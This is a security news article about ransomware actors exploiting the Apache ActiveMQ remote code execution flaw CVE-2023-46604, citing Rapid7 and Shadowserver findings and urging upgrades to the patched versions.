Threat actors are targeting a recently disclosed flaw in Apache ActiveMQ in order to attempt to deploy ransomware against targeted organizations.
Researchers with Rapid7 on Wednesday said that they have observed suspected exploitation of the remote code execution flaw (tracked as CVE-2023-46604) in two different customer environments. Apache disclosed this flaw and released patches for it on Oct. 25, and proof-of-concept exploit code is also available for the bug.
“Based on the ransom note and available evidence, we attribute the activity to the HelloKitty ransomware family, whose source code was leaked on a forum in early October,” according to Rapid7’s Managed Detection and Response team in an analysis. “Rapid7 observed similar indicators of compromise across the affected customer environments, both of which were running outdated versions of Apache ActiveMQ.”
ActiveMQ is Apache’s open source messaging service for enterprises, which allows different applications to exchange information with each other. According to Apache, the flaw could “allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.”
According to the Shadowserver Foundation, as of Oct. 30 around 7,249 Apache ActiveMQ instances were internet exposed, and around 3,329 of these were found to be vulnerable to the flaw.
In the attacks observed by Rapid7, the threat actors attempted to load remote binaries (called M2.png and M4.png) using MSIExec after the initial exploitation. Attackers’ ransomware deployment attempts were “somewhat clumsy,” researchers noted, and they tried unsuccessfully several times to encrypt assets.
However, the activity shows interest from threat actors in this flaw, and researchers recommend that security administrators apply the fixes as soon as they can. Several versions of Apache ActiveMQ are impacted, and users are recommended to upgrade to versions 5.15.16, 5.16.7, 5.17.6, or 5.18.3 in order to fix the flaw.
“Organizations should update to a fixed version of ActiveMQ as soon as possible and look for indicators of compromise in their environments,” according to Rapid7 researchers.